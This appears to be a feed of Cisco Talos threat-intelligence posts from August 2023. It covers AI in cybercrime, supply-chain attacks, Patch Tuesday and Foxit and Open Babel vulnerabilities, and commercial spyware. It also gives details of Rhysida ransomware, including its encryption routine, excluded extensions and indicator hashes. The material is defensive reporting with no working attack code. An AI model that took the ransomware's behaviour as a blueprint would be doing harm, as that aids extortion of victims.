Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week


SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725
MD5: d47fa115154927113b05bd3c8a308201
Typical Filename: mssqlsrv.exe
Claimed Product: N/A
Detection Name: Trojan.GenericKD.65065311

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6
MD5: 4c9a8e82a41a41323d941391767f63f7
Typical Filename: !!Mreader.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Generic::sheath

The rise of AI-powered criminals: Identifying threats and opportunities

14 August 2023 at 12:40
  • AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders.
  • The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.
  • Defenders and law enforcement can use AI to strengthen cybersecurity and counteract illicit activities.
The rise of AI-powered criminals: Identifying threats and opportunities

The past decade has seen a massive adoption in machine learning and artificial intelligence. An increasing number of organizations have been leveraging such technologies to automate their operations and make their products and services better.

Despite the extensive use of machine learning (ML) and artificial intelligence (AI) by organizations for some time now, many users have first interacted with such technologies over the past few months in the form of generative AI helping users to generate text, code, images and other digital assets with the provision of limited input. The likes of ChatGPT have brought AI to the top of the public’s mind, fueling an intensive race for AI development.

As with any innovation, the use of AI is expected to have positive and negative effects on global culture as we know it, but I suspect that cybercrime will be one of the areas most affected. On the negative side, AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. Concerning the positive impact of AI on cybersecurity, defenders, and law enforcement, can use AI to counteract advancements in illicit activity by developing new tools, tactics and strategies to automate data analysis, perform predictive detection of illicit activity and perform more effective attribution of criminal activity.

It is important to acknowledge that the AI use cases discussed in this blog encompass a range of varying complexities to achieve for both criminals and defenders. Certain use cases can be accomplished using readily available AI-enabled tools, while others demand advanced technical skills, costly infrastructure, and considerable time investments.

Empowering cybercrime

Cybercriminals are expected to benefit in many ways from advancements in machine learning and artificial intelligence.

A major area of impact of AI tools in cybercrime is the reduced need for human involvement in certain aspects of cybercriminal organizations, such as software development, scamming, extortions, etc., which in turn will decrease the need to recruit new members and lower operational costs due to the reduced need for headcount. While crime-related "job" postings typically find their way onto dark web forums and other anonymous channels, striving to ensure author anonymity, this practice carries significant risks as it could potentially unveil the identities and operations of criminals to whistleblowers and undercover law enforcement agents.

AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. Big data analytics is a complex undertaking necessitating significant processing power and thereby limiting its application to potentially large criminal organizations and state-sponsored actors capable of harvesting such power.

Another area of criminal activity that can thrive with AI is the development of more sophisticated phishing and social engineering attacks. This includes the creation of remarkably realistic deepfakes, deceitful websites, disinformation campaigns, fraudulent social media profiles and AI-powered scam bots. To illustrate the impact, consider an incident from 2020 wherein an AI-powered voice cloning attack successfully impersonated a CEO, resulting in the theft of more than $240,000 from a UK-based energy company. Similarly, in India criminals employed a machine learning model to analyze and mimic the writing style of a victim's email contacts to create highly personalized and persuasive phishing emails.

The utilization of AI is anticipated to also be prevalent among state-sponsored actors and prominent criminal organizations, to propagate disinformation and manipulate the public. Such tactics involve the creation and dissemination of deceptive content, including deep fakes, voice cloning, and the deployment of bots. Evidence of such practices already exists by a cybercriminal group employing AI for social media manipulation and spreading disinformation about the COVID-19 pandemic. This campaign relied on machine learning to identify emerging trends and generate highly convincing fake news articles.

The advancement of malware can also be impacted by allowing authors to streamline the process with the help of AI, enabling the creation of sophisticated and more adaptable malware. Allowing AI-powered malware to employ advanced techniques to evade detection by security solutions, utilizing "self-metamorphic" mechanisms rendering them capable of changing their operations based on the environment they operate in. Furthermore, criminals can potentially harness AI technology in the development of AI-powered malware development kits. These kits employ AI agents that learn from the latest tools, tactics, and procedures (TTPs) employed by malware authors, as well as stay updated with the latest advancements in security. An example of AI-powered malware is demonstrated by the researchers behind DeepLocker. Showcased how AI can be used to enhance targeted attacks, ensuring exploitation only when the intended target is present and to evade detection by concealing itself within benign applications.

Counteracting cybercrime

On the other side, cybersecurity professionals, defenders, and law enforcement agencies can harness the power of AI to counteract the advancements made in cybercrime. They can utilize AI to develop innovative tools, tactics, and strategies in their fight against malicious activities.

Areas such as threat detection and prevention will be at the forefront of AI security research. Many existing security tools, heavily rely solely on malicious signatures and user input, which render them ineffective for detecting advanced attacks. Consequently, an increasing number of vendors are turning to machine learning (ML) and AI technologies to achieve more precise and effective threat detection. Prominent examples include Cisco Secure Endpoint and Cisco Umbrella utilizing advanced machine learning to detect and mitigate suspicious behavior in an automated manner on end hosts and networks respectively. The inclusion of these technologies is likely to counter the malware being generated by AI discussed above.

Analysis of large amounts of data for the identification of indicators of compromise can be a tedious undertaking, consuming considerable time and money. As such, one area that can benefit from AI is Incident response and forensics for the automated analysis of large volumes of logs, system images, network traffic and user behavior for the identification of indicators of compromise (IOCs) and adversarial activity. AI can help speed up the investigation process, identify patterns that may be difficult to detect manually, and provide insights into the techniques and tools used by adversaries. Allowing more companies globally to have incident response and forensic capabilities.

Another potential use for AI by defenders and law enforcement alike is to enhance the attribution of criminal activity to adversaries through the analysis of multiple data points, including attack signatures, malware characteristics, and historical attack patterns, tools, tactics, and procedures. By examining these data sets, AI can identify patterns and trends that aid cybersecurity experts in narrowing down the potential origin of an attack. This attribution is valuable as it provides insights into the motives and capabilities of the attackers, allowing for a better understanding of their tactics and potential future threats. In addition, it allows defenders to more accurately identify adversaries that are leveraging tactics to evade identification by misleading attribution (e.g., use techniques, methodologies and tools another hacking group is using), which is an existing occurrence that defenders must consider when performing attribution. Such capabilities are primarily expected to be witnessed in the arsenal of state-affiliated cyber agencies as well as on a corporate level from threat intelligence providers.

ML algorithms and AI are set to expand their utilization for automated analysis and the identification of threats. Through the automated analysis of security-related data from multiple sources like threat intelligence feeds, dark web monitoring, and open-source intelligence, emerging threats can be identified and mitigated effectively. Cisco Talos has been leveraging AI for several years to automate threat intelligence operations such as the classification of similarly rendered web pages, identify spoofing attempts through logo analysis, phishing email classification based on text analytics and binary similarities analysis. Although existing work around emerging threats has proven to be highly effective, AI will further the area by allowing for more automate data collection, analysis, and correlation on a larger scale, facilitating the identification of patterns and trends that may signify new attack techniques or threat actors. This empowers cybersecurity professionals to proactively respond to emerging cyber threats by leveraging AI's ability to process and interpret vast amounts of data swiftly and accurately.

AI can also serve as a valuable tool for predictive analytics, enabling the anticipation of potential cyber threats and vulnerabilities based on historical data and patterns. By analyzing data from past attacks and adversaries, AI systems can identify common trends, patterns, or groups that may indicate or trigger future attacks. This capability empowers cybersecurity experts to take a more proactive stance to security, such as promptly patching vulnerabilities or implementing supplementary security controls, to mitigate potential risks before they are exploited by adversaries. Additionally, AI-driven predictive analytics allows for closer monitoring of adversaries' activities, enabling experts to anticipate and prepare for new attacks. By leveraging AI in this manner, cybersecurity professionals can enhance their defenses and stay one step ahead of evolving threats. A sizable number of cybercrime predictive research exists, highlighting how to practically use AI to support cybercrime research, as well as how to perform predictive analysis based on social and economic factors using the Bayesian and Markov Theories.

The rise of AI presents new challenges and great opportunities as its user base and applications continue to expand. The effective and targeted utilization of AI-related technologies will play a pivotal role for cybersecurity experts and law enforcement agencies in detecting, defending against, and attributing digital criminal behavior. By harnessing the power of AI, these entities can enhance their capabilities in combating evolving threats and ensuring the security of digital ecosystems. As the landscape of cybercrime evolves, embracing AI will be instrumental in staying ahead of adversaries.

Reflecting on supply chain attacks halfway through 2023

10 August 2023 at 18:00
Reflecting on supply chain attacks halfway through 2023

Welcome to this week’s edition of the Threat Source newsletter.

Between the Talos Takes episode last week and helping my colleague Hazel with the Half-Year in Review, I realized how much I had already forgotten about 2023 already.

It’s been a whirlwind, personally and professionally, and I think it’s important for the security community to take a step back occasionally, to look back on what’s already happened in a year and what that tells us about the coming months.

For me, in reading the Year in Review so far and reflecting on it on the podcast, I had completely forgotten about supply chain attacks. I personally think the MOVEit file transfer breach, and follow-on breaches and compromises, has been placed on the back burner because it’s almost too big for us to even conceive of. At this point, nearly every Fortune 500 company has been affected by this in some way.

The dangers of the MOVEit breach continue to grow, with Clop now using torrents to leak targets’ information, potentially making the leaks more dangerous and faster for bad actors to download.

The list of affected organizations grows every day, with the Clop ransomware group adding more names to its leak site, and public companies having to make disclosures about potential data leaks or theft. Yet the news around this seems to have been relegated to regular news posts about, “Company X just got added to the Clop leak site” rather than reflecting on the dangers of supply chain attacks.

I’ve written before about how we aren’t talking about supply chain attacks enough already, and this year alone we’ve seen MOVEit (which, in my opinion, kind of straddles the line as a “traditional” supply chain attack because it’s more of a data breach with more follow-on data breaches), 3CX, and another attack against CircleCI, a continuous integration platform vendor.

3CX was a big deal in the moment, but looking at the Half-Year in Review, I feel like we moved past it so quickly. Instead, headlines are still dominated by ransomware attacks and big-game hunting, which are certainly no less important on the security landscape — but it is so easy to get swept up in the day’s goings-on by looking for the latest, fastest updates on security social media.

With BlackHat and “Hacker Summer Camp” going on over the next few weeks, this seems like the right time to step back and reflect on what’s happened so far this year. This could include just taking time to look back on personal successes, team wins, or just one or two things that happened in February that you may have already forgotten about.

The one big thing

Our researchers recently discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that’s been going on since at least June 4. This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics. The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.

Why do I care?

This new actor appears to target users and companies all over the world, including a variety of English-speaking nations, Bulgaria, China and Vietnam. Victims hit with this malware are asked to pay a requested ransom in the form of Bitcoin, an amount that doubles if it’s not made within three days post-infection. This Yashma variant also appears to be harder to recover from than the average ransomware — after encrypting files, the ransomware wipes the contents of the original, unencrypted file and then replaces the file name with a “?”.

So now what?

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here. There are also numerous protections in place to detect and defend against this malware, as outlined in our blog post.

Top security headlines of the week

Dozens of hospitals and healthcare facilities across the U.S. are still recovering after a large healthcare system was forced to take its computer systems offline as the result of a ransomware attack. Prospect Medical Holdings, a chain that operates hospitals and outpatient facilities, in California, Connecticut, Pennsylvania and Rhode Island, first disclosed the incident last week, announcing it was having to shut down some emergency rooms and reroute ambulances to other facilities. The FBI announced it was launching an investigation into the cause, and actors behind, the attack. Some outpatient facilities, like radiology and heart health clinics, had to close altogether temporarily because they could not function without the use of the company’s computer systems. (CBS News, NBC News)

Cult of the Dead Cow, an infamous hacking group once known for shaming companies into improving their security, is planning to launch a new app framework that puts privacy first. The system will allow individuals and companies to create social media and messaging apps that do not hold onto users’ personal data. Traditional social media companies make a large chunk of their profits off selling that information to advertisers and other companies looking to reach certain demographics. Representatives from the hacking collective are expected to discuss the framework more at the upcoming DEF CON conference. Creators say the framework uses the in-house “Veilid” protocol for end-to-end encryption that could make it difficult for even governments to view information on the apps without proper authorization. However, they still face the challenge of convincing developers and companies to design apps that are compatible with Veilid. (Washington Post, DarkReading)

The U.K.’s Electoral Commission revealed this week it was the target of a “complex cyber attack” that potentially exposed the personal details of millions of British voters. The Commission said adversaries stole copies of the electoral registers from August 2021, but the breach was not discovered until October 2022. However, they’ve yet to “conclusively” determine what files, exactly, were accessed. An early report on the attack from the Electoral Commission found that the personal data found on the registers did not present a “high risk” to the individuals listed on it. However, that information could be paired with other public information or stolen data from other attacks to “identify and profile individuals.” The adversaries were removed from the network as soon as the breach was discovered in October. (Infosecurity Magazine, BBC)

Can’t get enough Talos?

Upcoming events where you can find Talos

Upcoming events where you can find Talos

BlackHat (Aug. 5 - 10)

Las Vegas, Nevada

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week


SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6
MD5: 4c9a8e82a41a41323d941391767f63f7
Typical Filename: !!Mreader.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Generic::sheath

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b
MD5: f5e908f1fac5f98ec63e3ec355ef6279
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::tpd

Out-of-bounds write vulnerabilities in popular chemistry software; Foxit PDF Reader issues could lead to remote code execution

9 August 2023 at 16:00
Out-of-bounds write vulnerabilities in popular chemistry software; Foxit PDF Reader issues could lead to remote code execution

Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader, one of the most popular PDF reader alternatives to Adobe Acrobat.

Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.

Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Multiple vulnerabilities in Open Babel software

Talos researchers recently discovered multiple vulnerabilities in Open Babel, an open-source software library used in a variety of chemistry and research settings.

Open Babel allows users to “search, convert, analyze, or store data from molecular modeling, chemistry, solid-state materials, biochemistry, or related areas,” according to its website, and is used in other popular pieces of software in the science field. Therefore, there are cases where these vulnerabilities are accessible via the internet.

The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted, malformed file. Depending on the platform and on how the code is compiled, these vulnerabilities could lead to arbitrary code execution:

Talos is disclosing these vulnerabilities despite no official fix from Open Babel. The vendor declined to release an update within the 90-day period as outlined in Cisco’s vulnerability disclosure policy.

Several issues in Foxit PDF reader could lead to arbitrary code execution

Foxit PDF Reader is one of the most popular PDF readers on the market, offering many similar features to Adobe Acrobat. The software also includes a browser extension that allows users to read PDFs right in their web browsers.

Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine. An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or, if the user has the browser extension enabled, by visiting a malicious web page:

What is commercial spyware?

9 August 2023 at 12:00
What is commercial spyware?

We’ve talked quite a bit about spyware recently, with very good reason. Recently, concerns have grown regarding the rapid growth of commercial spyware tools, and the way in which they are being used against their intended victims.

This Need to Know article talk about the broader effects of spyware becoming more commercialized, how it is being used, and the differences between commercial spyware and digital extortion.

What is commercial spyware, and why is it a growing trend?

In general terms, spyware is software that can be installed on a device and used to monitor activity and/or capture potentially sensitive data. The term has been around since the 1990s, and the first spyware to be identified was developed by criminals to steal passwords or financial information from devices.  Spyware can even be used to track the device's physical location and record from the camera or microphone.

The opportunities for governments and law enforcement to use spyware as part of legal investigations led to the development of commercial spyware.  Attackers have long used commercial products developed by legitimate companies to compromise targeted devices.

These products are known as commercial spyware. Commercial spyware operations mainly target mobile platforms with zero- or one-click zero-day exploits to deliver spyware.

Commercial spyware can be seen as having legitimate reasons to exist, especially in instances of crime and terrorism (as long as it is highly regulated). The problem is that there isn’t a universal or global way in which these companies are being regulated.

As such, we’ve seen a growing number of reports of victims who are targeted with commercial spyware. These victims are not criminals or terrorists, but instead, they are associated with activism. For example, there have been reports of journalists who report on human rights abuses, and activists shining a light on oppressive regimes, who have been targeted and compromised with this tooling.

Problems also arise when organizations turn a blind eye to the usage of commercial spyware.

A recent report from the United Kingdom’s National CyberSecurity Center (NCSC) highlights how the accessibility of these tools “lowers the barrier to entry to state and non-state actors in obtaining capability and intelligence.” The United States government also threatened to step in when it looked like a U.S. company was going to purchase NSO Group, an infamous Israeli maker of the Pegasus spyware.

What ways can you protect yourself if you might be a target of commercial spyware?

As the victims of commercial spyware are highly targeted individuals, the sobering truth is that some attackers have the means to be able to spend six figures to compromise a single target. It is therefore likely that they will try many things to compromise your mobile phone, including using zero-day attacks or unknown vulnerabilities.

That is very concerning to us, however, there are a couple of things that end users can look out for:

Although zero-click exploits do exist, they're not very common. Most of the time, unsolicited messages from various people are the first entry point. So, if you get a bunch of messages from strangers, don't click on the links, and don’t click on any attachments.

Additionally, something as simple as rebooting your phone can help clear the spyware from your device. This is because commercial spyware companies typically do not build persistence into their spyware.

If you are talking to someone who may be a target of commercial spyware (i.e., human rights journalists, activists, dissidents and lawyers) it’s a good idea to reboot your phone before you talk to them. It is entirely possible that these threat actors will go as far as compromising close contacts of their targets.

Notable example of commercial spyware

Talos provided a highly informative article on the PREDATOR commercial spyware, which has been around since 2019.

PREDATOR is intended to work with another spyware component called “ALIEN” (it’s not “Alien vs. Predator” this time; they’re working together). They work to bypass traditional security barriers on the Android operating system and provide a variety of information stealing, surveillance and remote access capabilities.

The differences between commercial spyware and digital extortion attacks

You may have received an email something like, “We know you’ve visited this adult website. We filmed you watching some videos. Now we’re going to send all your friends and family that footage unless you pay us in bitcoins.”

These are typically digital extortion attacks, not actual spyware. Attackers send these emails to multiple accounts, hoping that someone will believe the story, and pay up.

As we’ve talked about, commercial spyware is highly targeted. The customers of these commercial spyware organizations know who their victim(s) are. In digital extortion attacks, cyber criminals generally don’t know who their victims are, but they’re hoping as many people as possible believe the story, and pay up.

They will usually have found your email address via a data breach of a third party. If you receive such an email, just delete it and don’t give it a second thought. The email you received will be one of many thousands.

What is Cisco doing to take action against the growth of commercial spyware?

Cisco, Microsoft, and other tech companies have joined in supporting Meta's lawsuit against the NSO Group referenced above through court filings. Cisco was also a key drafter of the Cyber Mercenary Principles document adopted by the Cyber Tech Accord. The document acknowledges the threat realized by these commercial offerings and outlines the steps that organizations are taking to help limit the impacts of commercial spyware.

Learn more

Researchers at Cisco Talos recently wrote an ‘On the Radar’ article about the growth of spyware-based intelligence providers, without legal or ethical supervision. The article also looks to the untethered future of commercial spyware and contains advice about what to do if you feel you have been targeted with spyware - especially if you have a higher risk profile (i.e., journalists and dissidents).

Also check out this episode of the Talos Takes podcast, where Asheer Malhotra talks to Jon Munshaw about the dangers of spyware and mercenary groups.

What Cisco Talos knows about the Rhysida ransomware

8 August 2023 at 19:36
What Cisco Talos knows about the Rhysida ransomware

Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services (HHS) warning the healthcare industry about Rhysida ransomware activity.

As we've discussed recently, there has been huge growth in the ransomware and extortion space, potentially linked to the plethora of leaked builders and source code related to various ransomware cartels. This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly. Rhysida appears to have first popped up back in May, with several high-profile compromises posted on their leak site.

Rhysida ransomware details

As we commonly see in the ransomware space, this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control (C2) frameworks like Cobalt Strike. These frameworks are commonly delivered as part of traditional commodity malware, so infection chains can vary widely.

The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below. They claim to have compromised the company and are willing to help resolve the issue.  These types of approaches are not uncommon — historically, groups have done things like provide "security reports" to compromised organizations to help them "resolve the issue."

What Cisco Talos knows about the Rhysida ransomware
Sample ransom note.

The group appears to commonly deploy double extortion — of the victims that have been listed on the leak site, several of them have had some portion of their exfiltrated data exposed.

Encryption algorithm

Rhysida’s encryption algorithm is relatively straightforward and uses the ChaCha20 encryption algorithm. We have seen this algorithm deployed by other groups before, either as a standalone encryption algorithm or as part of a more custom approach. Rhysida will enumerate through directories and files in directories starting from “A:” to “Z:” drives, ensure they’re missing from the “exclude list” and then “process,” i.e., encrypt the files. Once encrypted, the file is then renamed to “<filename>.rhysida”.

What Cisco Talos knows about the Rhysida ransomware
Rhysida’s algorithm for “processing” files.

The file exclusion list maintained in Rhysida samples is most of the usual system directories required for the operating system to function:

What Cisco Talos knows about the Rhysida ransomware
Excluded folders.

Excluded extensions include:

.bat .bin .cab .cmd .com .cur .diagcab .diagcfg, .diagpkg .drv .dll .exe .hlp .hta .ico .lnk .msi .ocx .ps1 .psm1 .scr .sys .ini Thumbs.db .url .iso .cab

After encryption, the ransomware will display the ransom note by creating and opening it as a PDF and the background wallpaper. The PDF usually named  “CriticalBreachDetected.pdf” is generated using content embedded in the ransomware binary, including the skeleton PDF and the ransom note (shown above). The ransom note is also used to generate a message in the form of the background wallpaper typically located at “C:/Users/Public/bg.jpg”.

This new ransomware variant doesn't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks. This isn't even the only new ransomware group we've written about this week.

Coverage

Ways our customers can detect and block this threat are listed below.

What Cisco Talos knows about the Rhysida ransomware

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Cisco Talos is releasing the following Snort SIDs to protect against this threat: 62220 - 62229, 300653 - 300657.

Indicators of compromise

D5C2F87033A5BAEEB1B5B681F2C4A156FF1C05CCD1BFDAF6EAE019FC4D5320EE
1A9C27E5BE8C58DA1C02FC4245A07831D5D431CDD1A91CD35D2DD0AD62DA71CD
258DDD78655AC0587F64D7146E52549115B67465302C0CBD15A0CBA746F05595
0BB0E1FCFF8CCF54C6F9ECFD4BBB6757F6A25CB0E7A173D12CF0F402A3AE706F
F6F74E05E24DD2E4E60E5FB50F73FC720EE826A43F2F0056E5B88724FA06FBAB
250E81EEB4DF4649CCB13E271AE3F80D44995B2F8FFCA7A2C5E1C738546C2AB1
A864282FEA5A536510AE86C77CE46F7827687783628E4F2CEB5BF2C41B8CD3C6
6903B00A15EFF9B494947896F222BD5B093A63AA1F340815823645FD57BD61DE
3BC0340007F3A9831CB35766F2EB42DE81D13AEB99B3A8C07DEE0BB8B000CB96
2A3942D213548573AF8CB07C13547C0D52D1C3D72365276D6623B3951BD6D1B2

Six critical vulnerabilities included in August’s Microsoft security update

8 August 2023 at 19:25
Six critical vulnerabilities included in August’s Microsoft security update

Microsoft disclosed 73 vulnerabilities across its suite of products and software Tuesday, including six that are considered “critical.”

One of the vulnerabilities, which Microsoft considers to be only of "moderate" severity, has been actively exploited in the wild. The company has had to address many zero-day vulnerabilities in its monthly security updates this year, including four last month and one in May. Microsoft also released an advisory detailing changes to its defense-in-depth model to defend against tactics adversaries are currently using in the wild.

Outside of the six critical issues, two are considered to be of “moderate” severity, while the remainder are listed as “important.”

Two of the critical vulnerabilities lie in Microsoft Teams, the company’s popular collaboration and messaging platform. An attacker could exploit CVE-2023-29328 and CVE-2023-29330 to perform remote code execution in the context of the victim user.

An attacker could exploit these vulnerabilities by tricking the victim into joining an adversary-created Teams meeting.

Three other critical remote code execution vulnerabilities — CVE-2023-35385, CVE-2023-36910 and CVE-2023-36911 — exist in Microsoft’s message queuing service for certain versions of Windows 10, 11 and Windows Server.

Message queuing would need to be manually enabled on a target’s machine for it to be exploitable, according to Microsoft. Users can check to see if they’re vulnerable by checking if there is a service named “Message Queuing” running on their device and if port 1801 is listening on the machine.

The last critical vulnerability included in August’s Patch Tuesday is CVE-2023-36895, a remote code execution vulnerability in Microsoft word. However, it has a relatively low severity score of 7.8 out of 10 for a critical vulnerability.

Microsoft Exchange also contains four remote code execution vulnerabilities, though all are considered “important.”

An authenticated attacker who is on the same intranet as the Exchange Server could achieve remote code execution via a PowerShell remoting session, according to Microsoft, by exploiting CVE-2023-35388, CVE-2023-35368, CVE-2023-38182 and CVE-2023-38185.

An adversary could only exploit the vulnerabilities in Exchange Server if they have valid credentials to log in with LAN access and have access to a valid Exchange user account.

There are also four elevation of privilege issues in the Windows kernel that could allow an adversary to gain SYSTEM-level privileges: CVE-2023-35359, CVE-2023-35380, CVE-2023-35382 and CVE-2023-35386.

Microsoft’s advisories state that these issues are “more likely” to be exploited, though the adversary must first have local access to the targeted machine, and the targeted user needs to be able to create folders and performance traces on the machine, which most users have by default.

Another privilege escalation vulnerability, CVE-2023-36900, exists in the Windows Common Log File System Driver. An attacker could also exploit this vulnerability to gain SYSTEM-level privileges, though they first must be able to log into the targeted system with the privileges of a standard user.

The only vulnerability Microsoft states is being exploited in the wild is CVE-2023-38180, a denial-of-service vulnerability in .NET and Microsoft Visual Studio. Though there are little details available currently about this issue, Microsoft states that the attack complexity is “low” and does not require any user privileges or interaction for an attacker to exploit it.

Talos would also like to highlight five “important” vulnerabilities that Microsoft considers “less likely” to be exploited. However, as these issues exist in the popular Microsoft Office suite of products and could lead to remote code execution, are still worth noting:

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 40689, 40690, 62202, 62203, 62208 - 62211, 62215 and 62216. There are also Snort 3 rules are 300648 - 300650 and 300652.

Code leaks are causing an influx of new ransomware actors

7 August 2023 at 12:00
Code leaks are causing an influx of new ransomware actors

Ransomware gangs are consistently rebranding or merging with other groups, as highlighted in our 2022 Year in Review, or these actors work for multiple ransomware-as-a-service (RaaS) outfits at a time, and new groups are always emerging.

This trend is already continuing this year. Since 2021, there have been multiple leaks of ransomware source code and builders — components that are essential to creating and modifying ransomware. This has had a significant effect on the threat landscape, giving unsophisticated actors the ability to easily generate their own ransomware with little effort or knowledge. As more actors enter this space, Cisco Talos is seeing an increasing number of ransomware variants emerge, leading to more frequent attacks and new challenges for cybersecurity professionals, particularly regarding actor attribution.

Code leaks are benefitting threat actors

Since September 2021, we have seen actors publicly disclosing source code and builders for prominent ransomware families, including Babuk, Conti, LockBit 3.0 and Chaos. In some cases, such as LockBit 3.0’s ransomware builder, these leaks have been intentional, with affiliates posting these tools and codes to protest against broader group policies they are unhappy with. In other instances, such as the Babuk source code, the leaks were seemingly an operational error. Regardless of the cause, these leaks are having a significant effect on the threat landscape, making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge.

